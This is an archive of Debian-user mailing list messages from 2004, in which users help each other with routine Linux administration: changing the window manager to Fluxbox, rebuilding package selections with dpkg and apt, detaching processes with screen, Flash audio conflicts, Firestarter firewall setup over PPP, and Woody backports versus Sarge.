Do you want to use kde? Or do you want to use fluxbox exclusively? If so just change /etc/X11/default-display-manager like this: echo `which xdm` > /etc/X11/default-display-manager * Tony Uceda Velez ([EMAIL PROTECTED]) wrote: > > I tried that with no success. I left the default-display manager entry to > xdm. Simply creating that file and adding 'exec fluxbox' (without the > quotes). Upon starting X and getting my login window (under KDE) it halts > and can't get past loading any of the other services under X. I deleted the > file and restored as it was. Another Debian user suggested solely changing > ~/.xsession. I somehow feel there is more to this. Finding some errors in > my ~/.xsession-errors file, I see errors pertaining to the following: > > _IceTransmkdir: Owner of /tmp/.ICE-unix should be set to root > Invalid entry (missing '=') at /home/tonyuv/Desktop/Debian.desktop:2 > Invalid entry (missing '=') at /home/tonyuv/Desktop/Debian.desktop:3 > Invalid entry (missing '=') at /home/tonyuv/Desktop/Debian.desktop:4 > Invalid entry (missing ']') at /home/tonyuv/Desktop/Debian.desktop:5 > > Looking at this file, I see the following: > > [Desktop Entry] > Icon=deb > Type=Link > URL=file:/etc/kde2/debian.html > > Any significance or adminissable error you think? > > Thanks so much. > > Tony UcedaVélez > Security Analyst > [EMAIL PROTECTED] > 877.884.1110 > -- > SecureWorks. Rock-solid Internet security. > No hassles. No headcount. No capital outlay. > -- > http://www.secureworks.com > > > -Original Message- > From: Alex Derkach [mailto:[EMAIL PROTECTED] > Sent: Thursday, July 22, 2004 3:20 PM > To: [EMAIL PROTECTED] > Subject: Re: your mail > > > Add 'exec fluxbox' (without quotes) to the last line of your .xinitrc > file (should be in $HOME/.xinitrc, if not, make one) > * Tony Uceda Velez ([EMAIL PROTECTED]) wrote: > > Greetings - > > > > Changing my default desktop manager in Debian has proven a little more > > cumbersome than I thought. I edited my > > /etc/X11/default-display-manager file to the absolute path of where the > > fluxbox binary file is. Upon restarting X, no dice. Any suggestions to > any > > fellow Debian-Fluxbox fans? > > > > Many thanks. > > > > > > Tony UcedaVélez > > Security Analyst > > [EMAIL PROTECTED] > > 877.884.1110 > > -- > > SecureWorks. Rock-solid Internet security. > > No hassles. No headcount. No capital outlay. > > -- > > http://www.secureworks.com > > > > -- > lynx -dump www.infiltrated.net/wtf | > grep "+-" | > sed 's/\\//g;s/\// /g;s/\&//;s/-/ /g' | > awk '{print $2,$3,$4,$5}' | > sed 's/ //g' > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > -- lynx -dump www.infiltrated.net/wtf | grep "+-" | sed 's/\\//g;s/\// /g;s/\&//;s/-/ /g' | awk '{print $2,$3,$4,$5}' | sed 's/ //g' -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
RE: Debian-Fluxbox Q
Ok...looking further into my startup scripts, I see that the flag in the /etc/init.d/xdm file has a flag for using this default-display-manager file. It's called HEED_DEFAULT_DISPLAY_MANAGER=true and as shown above it's set to true. If set to false, is it safe to say that the .xinitrc and .xsession files would come into play? Out of curiousity, I think KDE is currently started by using this file, b/c the default-display-manager file calls KDE. How come KDE doesn't require my user to have a .xsession file nor a .xinitrc file? Thanks again. Tony UcedaVélez Security Analyst [EMAIL PROTECTED] 877.884.1110 -- SecureWorks. Rock-solid Internet security. No hassles. No headcount. No capital outlay. -- http://www.secureworks.com -Original Message- From: Paul Johnson [mailto:[EMAIL PROTECTED] Sent: Thursday, July 22, 2004 4:12 PM To: Tony Uceda Velez Cc: [EMAIL PROTECTED] Subject: Re: none Tony Uceda Velez <[EMAIL PROTECTED]> writes: > Changing my default desktop manager in Debian has proven a little more > cumbersome than I thought. I edited my > /etc/X11/default-display-manager file to the absolute path of where the > fluxbox binary file is. Upon restarting X, no dice. Any suggestions to any > fellow Debian-Fluxbox fans? You only need to edit your ~/.xsession to change your window manager or desktop environment...
Re: dpkg/apt question
--- Preston Boyington <[EMAIL PROTECTED]> wrote: > dpkg --set-selections < packages.txt > > then: > > apt-get install ^^^ Wrong. You want to do: apt-get dselect-upgrade -- Thomas Adam = "The Linux Weekend Mechanic" -- http://linuxgazette.net "TAG Editor" -- http://linuxgazette.net " We'll just save up your sins, Thomas, and punish you for all of them at once when you get better. The experience will probably kill you. :)" -- Benjamin A. Okopnik (Linux Gazette Technical Editor) ___ALL-NEW Yahoo! Messenger - so many all-new ways to express yourself http://uk.messenger.yahoo.com -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Detaching and reattaching a process to different terminals?
Also- nohup setsid is a simple and quick way to acheive this for new processes. Cheers Awais Ahmad - Original Message - From: "Jon" <[EMAIL PROTECTED]> To: "Stephen Touset" <[EMAIL PROTECTED]> Cc: <[EMAIL PROTECTED]> Sent: Thursday, July 22, 2004 3:37 PM Subject: Re: Detaching and reattaching a process to different terminals? > The program your looking for (for in the future) is called screen. > apt-get install screen > > >From the package description: > "screen is a terminal multiplexor that runs several separate "screens" > on a single physical character-based terminal. Each virtual terminal > emulates a DEC VT100 plus several ANSI X3.64 and ISO 2022 functions. > Screen sessions can be detached and resumed later on a different > terminal." > > Run screen first. Then it will give you a shell again. > Run whatever app you want on that terminal. > > To detach, hit control-a then d > To reattach, run screen -r > (-r for resume, control-a is the command char to screen, and d is detach) > You can also hit control-a ? in screen for more commands. > > As I said, as you have to run screen first, this won't help with your > current problem, but in the future it may. > > Another handy feature is you can have up to 10 terminals in one screen season. > Tons of other useful features as well. > > GNU Screen: an introduction and beginner's tutorial > http://www.kuro5hin.org/story/2004/3/9/16838/14935 > > > On Thu, 22 Jul 2004 09:00:46 -0400, Stephen Touset <[EMAIL PROTECTED]> wrote: > > I'm running a program for a research study I'm involved in, but I've run > > into a slight problem. I executed it on an xterm (and it's been running > > for a few days now, so I don't want to stop it mid-calculation), but > > today is a workday. At work, I use two screens on my laptop. The only > > way to accomplish this is to restart X so Xinerama can take effect. > > Unfortunately, this will also have the nasty side effect of killing > > execution. > > > > Is there any way to detach the pid from that terminal and reattach it to > > one of the consoles? Or background it in a way where it will survive X > > restarting? It's not critical, but it's something I've wondered before, > > and which will come in extremely handy today. > > > > -- > > Stephen Touset <[EMAIL PROTECTED]> > > > > > > > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED] > > > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: flash and mozilla (and firefox and epiphany)
->>In response to your message<<- --received from Wim De Smet-- > > On Wed, 21 Jul 2004 14:14:03 -0700, Paul Yeatman <[EMAIL PROTECTED]> wrote: > > I just noticed something I didn't notice before. Since I have learned > > I need to kill esd before going to a flash-enabled web site to see the > > flash correctly (and not have my browser die), I assumed the flash was > > spawning its own esd process. Actually, I just noticed that, while > > flash is playing correctly--without freezing and with sound--no esd > > process is running. So flash must be accessing /dev/dsp directly which > > thus must be the problem when an esd process is already running. > > Sounds logical. > > > > > Thus, the solution would seem to be (as Wim pointed out) the sound > > driver wrapper used by Mozilla. Unless I'm using it wrongly (again, > > I'm using Sarge), it doesn't appear to solve the problem. I'm assuming > > if I'm using esd that I want the value of "esddsp" for MOZILLA_DSP. > > Yet neither this nor the value "auto" seems to allow flash to play from > > a web browser while esd is running. In both cases, the flash > > animation and the browser itself hangs. Part of the strangeness > > is that this wasn't a problem in Woody. This has only been the > > case since I've upgraded to Sarge (which possibly is due to a > > later version of Mozilla?). > > It seems strange that it doesn't just work out of the box. Are you > using the latest version of the flashplugin btw (installed with the > deb package I presume?). You may want to file a bug report on this. I > think it should just work... At the moment, I have Flash installed from a download from Macromedia itself. This is only because I could never get things to work with the Debian flashplugin-nonfree package nor a flash plugin package provided from another apt source site (both using version 7, I'm fairly confident). Now the value I was using for MOZILLA_DSP was "espdsp" the whole time (I never thought to try different values for this back then). I don't know if that has anything to do with why things were not working but seems to me to be the best setting given that I'm using esd. Due to the overall problem, I spent some time in the Macromedia Flash mailing list where I read someone commenting about how many problems would be avoided if people only read the instructions and followed advice/instructions given via the mailing list. This is when I downloaded the plugin, version 7.0 r25, directly from Macromedia and followed the instructions to the "t" (which, interestingly enough, places one of the two files in a different location). I hoped this may solve things but no dice. This is what I still have installed at the moment. I now am convinced that the problem resides with the appearance that Flash accesses /dev/dsp directly creating a conflict anytime another application has already locked the dsp device first, such as esd. The Mozilla wrapper that seems to offer a way around this doesn't appear to work for me. My current solution is to change the default behavior of esd from "auto_spawn" being set to off to being on and, as I'm using gnome, either disabling sound in gnome altogether or killing the esd process that is started once I log in. This solution is satisfactory for the moment but took quite awhile to figure out. Likewise, I find it strange that things didn't work right out of the box (and if I've had such a problem with it, why not many others?). Where do you suggest filing a bug report: with Debian, Mozilla, Macromedia, . . . ? Thanks to you and everyone else for the replies with insights and feedback. Paul -- Paul Yeatman (858) 534-9896[EMAIL PROTECTED] == ==Proudly brought to you by Mutt== == -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: KVM (kernel memory interface)
stan said on Thu, Jul 22, 2004 at 04:45:12PM -0400: > On Wed, Jul 21, 2004 at 05:43:36PM -0400, Stewart Flood wrote: > > I'm starting a project to port a very large application from FreeBSD to > > Debian. I've gotten past some of the initial porting issues, but I'm stuck > > on this one: under FreeBSD we used the kernel memory interface (KVM), but > > Debian doesn't seem to have kvm.h and I can't find a man page on it. > > > > Is there a package that I need to install? If not, what do I use to get the > > functionality of KVM? > > > I don't know the answer to this, but I might be able to jog someones > memory. > > The kvm interface in the BSD's is used to collect things like process > information etc. > > How is that done in Linux? > > I'm talking about the kind of info that top shows. You read values out of the /proc filesystem. I don't believe there is a KVM interface to the Linux /proc information, though; you'll need to provide your own layer. M pgpCkeraoMFZO.pgp Description: PGP signature
Re: KVM (kernel memory interface)
On Wed, Jul 21, 2004 at 05:43:36PM -0400, Stewart Flood wrote: > Greetings... > > I'm starting a project to port a very large application from FreeBSD to > Debian. I've gotten past some of the initial porting issues, but I'm stuck > on this one: under FreeBSD we used the kernel memory interface (KVM), but > Debian doesn't seem to have kvm.h and I can't find a man page on it. > > Is there a package that I need to install? If not, what do I use to get the > functionality of KVM? > I don't know the answer to this, but I might be able to jog someones memory. The kvm interface in the BSD's is used to collect things like process information etc. How is that done in Linux? I'm talking about the kind of info that top shows. -- "They that would give up essential liberty for temporary safety deserve neither liberty nor safety." -- Benjamin Franklin -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
RE: your mail
I tried that with no success. I left the default-display manager entry to xdm. Simply creating that file and adding 'exec fluxbox' (without the quotes). Upon starting X and getting my login window (under KDE) it halts and can't get past loading any of the other services under X. I deleted the file and restored as it was. Another Debian user suggested solely changing ~/.xsession. I somehow feel there is more to this. Finding some errors in my ~/.xsession-errors file, I see errors pertaining to the following: _IceTransmkdir: Owner of /tmp/.ICE-unix should be set to root Invalid entry (missing '=') at /home/tonyuv/Desktop/Debian.desktop:2 Invalid entry (missing '=') at /home/tonyuv/Desktop/Debian.desktop:3 Invalid entry (missing '=') at /home/tonyuv/Desktop/Debian.desktop:4 Invalid entry (missing ']') at /home/tonyuv/Desktop/Debian.desktop:5 Looking at this file, I see the following: [Desktop Entry] Icon=deb Type=Link URL=file:/etc/kde2/debian.html Any significance or adminissable error you think? Thanks so much. Tony UcedaVélez Security Analyst [EMAIL PROTECTED] 877.884.1110 -- SecureWorks. Rock-solid Internet security. No hassles. No headcount. No capital outlay. -- http://www.secureworks.com -Original Message- From: Alex Derkach [mailto:[EMAIL PROTECTED] Sent: Thursday, July 22, 2004 3:20 PM To: [EMAIL PROTECTED] Subject: Re: your mail Add 'exec fluxbox' (without quotes) to the last line of your .xinitrc file (should be in $HOME/.xinitrc, if not, make one) * Tony Uceda Velez ([EMAIL PROTECTED]) wrote: > Greetings - > > Changing my default desktop manager in Debian has proven a little more > cumbersome than I thought. I edited my > /etc/X11/default-display-manager file to the absolute path of where the > fluxbox binary file is. Upon restarting X, no dice. Any suggestions to any > fellow Debian-Fluxbox fans? > > Many thanks. > > > Tony UcedaVélez > Security Analyst > [EMAIL PROTECTED] > 877.884.1110 > -- > SecureWorks. Rock-solid Internet security. > No hassles. No headcount. No capital outlay. > -- > http://www.secureworks.com > -- lynx -dump www.infiltrated.net/wtf | grep "+-" | sed 's/\\//g;s/\// /g;s/\&//;s/-/ /g' | awk '{print $2,$3,$4,$5}' | sed 's/ //g' -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
cross compiling
is there an easy way to build a cross compiler? i'm using testing/. i saw there's a toolchain-source and a binutils-multiarch package. now that i have them installed, what do i do? i want to build an x86 -> ppc toolchain (and sparc, in the future). tia! -- Tom Vier <[EMAIL PROTECTED]> DSA Key ID 0x15741ECE -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: none
Tony Uceda Velez <[EMAIL PROTECTED]> writes: > Changing my default desktop manager in Debian has proven a little more > cumbersome than I thought. I edited my > /etc/X11/default-display-manager file to the absolute path of where the > fluxbox binary file is. Upon restarting X, no dice. Any suggestions to any > fellow Debian-Fluxbox fans? You only need to edit your ~/.xsession to change your window manager or desktop environment... pgpbvKDtwi6JK.pgp Description: PGP signature
Re: Confounded by Firestarter "Issues"... (update)
Okay... I've figured out a couple of things. I'll post them here in case anyone else gets in the same trouble. There are hints of solutions to all this in various places scattered around the Web, but nothing explicit or in one place, that I could find. Basically, I just spent enough time trying combinations of things and finally got lucky. (I have V0.8xx so any or all of this may or may not apply to later versions.) (1) The setup "wizard" defaults to device "eth0" as the primary communication device. If you *either* fail to select "ppp0" *or* the selection somehow changes (which is what happened to me, emphasis on the "somehow" - rerunning the "wizard" and regenerating the Firestarter shell script is a common procedure and probably subject to accidents, if nothing else...), Firestarter redirects various (but not all!) IP traffic to the LAN interface - i.e., things which are supposed to go in/out the connection to the ISP, end up forwarded to the Ethernet interface (causing the MAC transaction kernel logging messages to appear in the console window). Interestingly, enabling specific connections to specific IP addresses in the Firestarter rules, does cause those connections to then be directed to whatever running app needs them, on a rule-by-rule basis, while everything else continues to squirt out the Ethernet interface. This setup idiosyncrasy is undoubtedly the result of Firestarter being intended to run on a dedicated firewall machine, rather than being set up as a "personal firewall"... (2) Starting Firestarter manually as root *before* using "kppp" to connect with an ISP, does not work. What happens is, Firestarter can't find an existing pppd task to glom onto, and (for whatever reason), guess what - goes about redirecting the IP traffic out onto the network interface, in the same manner as it does if the "eth0" device is incorrectly selected. *Restarting* the firewall *after* establishing the PPP connection causes the firewall to start working correctly (at least, apps/utilities (Netscape, "ping", etc.) can then access the PPP connection correctly). Based on some snatches of conversation I found on the "sourceforge" website, I suspect that Firestarter needs to be started by init.d, and at the correct runlevel, in order to avoid this second problem. However, in my case at least, I was forced to disable the (default) startup behavior, because it locked up KDE on startup. There are some "gtk" errors (e.g., Gtk-WARNING **: invalid cast from (NULL) pointer to `GtkContainer', Gtk-CRITICAL **: file gtkcontainer.c: line 726 (gtk_container_remove):assertion `container != NULL' failed., etc.) which are generated with every call Firestarter makes to the window it puts up (i.e. every time it updates the transaction log in the log window), and apparently that causes KDE to choke on startup. (Interestingly, logging in and starting KDE as root worked, but logging in as a non-privileged user did not - go figure...). There was also a problem involving locale detection, which I've since fixed; I suppose I should try reinstating the init.d links to see if that was what was causing the KDE lockup. But, I'm not sure I want the firewall running until I'm ready to start a dialup connection in any case. Thus far, I haven't found any solution to the "gtk" error messages, which are commonly discussed in various places on the net w/r/t various apps; they're mentioned specifically w/r/t Firestarter on one of the German Linux security websites, but (to the best of my limited ability to translate German) the problem was deemed unsolvable without an upgrade. (I haven't looked to see if there's a newer "stable" version of the Gnome toolkit yet... I suppose that's worth a try.) Upgrading "woody" to Firestarter 0.9xx is more or less unworkable, from what I can tell (as has been previously explored here...) - a complete upgrade to "sarge" would make more sense. Unless I can find a backport of Firestarter version 0.9xx to Woody, I'll have to work around all the "Issues" for the time being. I may end up just using the scripts and "iptables" commands Firestarter has generated, as a starting point for a manually scripted personal firewall implementation. Thanks to everyone who responded, for your help. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
dpkg/apt question
i have "inherited" an existing debian box and want to change the packages to suit me and the office that it will now be used. i would like to take the installed packages listed from: dpkg --get-selections > packages.txt and edit the file to reflect what i actually want/need on the box. after i get the edited list prepared, is there a command i can issue that will instruct apt or dpkg to add/remove the programs to reflect my changes? on a fresh install i would do: dpkg --set-selections < packages.txt then: apt-get install but i don't know the command to do this from a existing setup. would someone shed some light on this for me? thanks, Preston
Re: your mail
Add 'exec fluxbox' (without quotes) to the last line of your .xinitrc file (should be in $HOME/.xinitrc, if not, make one) * Tony Uceda Velez ([EMAIL PROTECTED]) wrote: > Greetings - > > Changing my default desktop manager in Debian has proven a little more > cumbersome than I thought. I edited my > /etc/X11/default-display-manager file to the absolute path of where the > fluxbox binary file is. Upon restarting X, no dice. Any suggestions to any > fellow Debian-Fluxbox fans? > > Many thanks. > > > Tony UcedaVélez > Security Analyst > [EMAIL PROTECTED] > 877.884.1110 > -- > SecureWorks. Rock-solid Internet security. > No hassles. No headcount. No capital outlay. > -- > http://www.secureworks.com > -- lynx -dump www.infiltrated.net/wtf | grep "+-" | sed 's/\\//g;s/\// /g;s/\&//;s/-/ /g' | awk '{print $2,$3,$4,$5}' | sed 's/ //g' -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Backports vs. Sarge
'ello, I am in a bit of a quandary with my Woody server and was wondering what people's thoughts are. I wanted to compile mod_python so that my MoinMoin Wiki would go faster. This required that I install the apache2-threaded-dev package. Unfortunately, the version of apache2 from backports.org has moved on since I installed it (2.0.48 at the time -- and it is now 2.0.50). The problem I have is that if I upgrade, I will have to move to 2.0.50. Seeing as Sarge only has 2.0.49 and may be released soon, I don't want to upgrade. This is because I imagine that if Sarge is released and I have a newer version of apache2, I'll never be able to update my apache2 and get security updates, etc. The same thing has happened with the ClamAV packages (sarge has 0.73 and the earliest backport I can find is 0.74). I really don't know what I should do -- have you got any suggestions? To be honest, I was thinking of upgrading my whole server to Sarge and tracking that back down to stable. The reason for this is that I need to have a proper Postfix2 (amongst other things) set-up all sorted out before I move back to uni. When I go, I don't want to be dist-upgrading because there would be no way I could fix the box if it goes wrong (I'd be >100 miles away from it :-)). The reason I am so apprehensive is that I have never been through a Debian stable dist-upgrade cycle before and am not sure what to expect. I really like Debian and have used it exclusively, after trying most of the others, for over 1.5 years now (Sid/Sarge desktops and a Woody server). These types of issues have been getting me down recently, though. I think it would be a great idea to have a stable server release every six months or year and have the Desktop on a separate track (as that appears to be one of the more difficult things to stabilise). This would mean that servers could be kept reliable but not ancient :-) and desktops could be released ``when they're done''. I don't mean to upset anyone or start a flame war by saying that; it's just an idea that occurred to me. Any advice on my current situation would be greatly appreciated. Thanks in advance, bye just now, -- Matthew T. Atkinson <[EMAIL PROTECTED]> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Debian-Fluxbox Q
In my excitement, I forgot a subject in my last envoy of this msg. Apologies. Greetings - Changing my default desktop manager in Debian has proven a little more cumbersome than I thought. I edited my /etc/X11/default-display-manager file to the absolute path of where the fluxbox binary file is. Upon restarting X, no dice. Any suggestions to any fellow Debian-Fluxbox fans? Many thanks. Tony UcedaVélez Security Analyst [EMAIL PROTECTED] 877.884.1110 -- SecureWorks. Rock-solid Internet security. No hassles. No headcount. No capital outlay. -- http://www.secureworks.com
[no subject]
Greetings - Changing my default desktop manager in Debian has proven a little more cumbersome than I thought. I edited my /etc/X11/default-display-manager file to the absolute path of where the fluxbox binary file is. Upon restarting X, no dice. Any suggestions to any fellow Debian-Fluxbox fans? Many thanks. Tony UcedaVélez Security Analyst [EMAIL PROTECTED] 877.884.1110 -- SecureWorks. Rock-solid Internet security. No hassles. No headcount. No capital outlay. -- http://www.secureworks.com
Re: Burner app with ISO validation
Please turn your word wrap on to something like 72 columns instead of 1 paragraph; we shouldn't have to reformat just to read it on a standard 80-column window. Marcus <[EMAIL PROTECTED]> writes: > Can anyone recommend a DVD burning program which can vaildate the ISO > checksum after completion? Well, if you also have the iso.md5, you can eyeball the MD5 of the CD to the known md5 from the iso.md5. > I have used K3B, but the current version gives errors with DVDs on > checking . (DVD burning works fine with Nero.) Have you tried playing or mounting the DVD? That would be the easiest way to see if it works... pgpTQunlF6cyC.pgp Description: PGP signature
winbind and pam_mount
Hi, I am configuring a system to authenticate users against an AD windows 2003 server, and if the user does not have a homedir it will automatically be created on the Linux server. Ive managed to do all this using the winbind daemon, samba, kerboros (for autherntication) to the AD server. However i would like to take this one step forward so that users windows "Home Directories" are also automatically mounted upon logon to the linux server, they need to be mounted within a mount folder under their Linux homedir . i can do this using pam_mount, but this means i need to know exactly which windows server the users homedirectory is located, i would like a way for querying the ADS to check which windows server the user is on and then automatically mount the windows homedir on the linux server. Does anyone have a script or know anyway this can be done? cheers and Thanks Kool
Re: /cdrom vs. /media/cdrom
Joey Hess <[EMAIL PROTECTED]> writes: > Paul Johnson wrote: >> I don't have a /media, and my laptop, which I just installed Debian on, >> also doesn't have a /media. ??? > > Then you didn't install sarge using a current version of the installer. OK, I just wasn't paying close attention and didn't notice. >> I believe the LSB puts removable media in /mnt/fd0, /mnt/scd0, etc. >> Debian puts the same devices in /floppy, /cdrom0, etc. > > LSB goes with the FHS locations in this and generally all cases, and > recent FHS versions require /media. Using /mnt subdirectories has always > broken stuff and has never been in the LSB or the FHS. Ah, OK. You learn something new every day. pgpDbCNmUfna5.pgp Description: PGP signature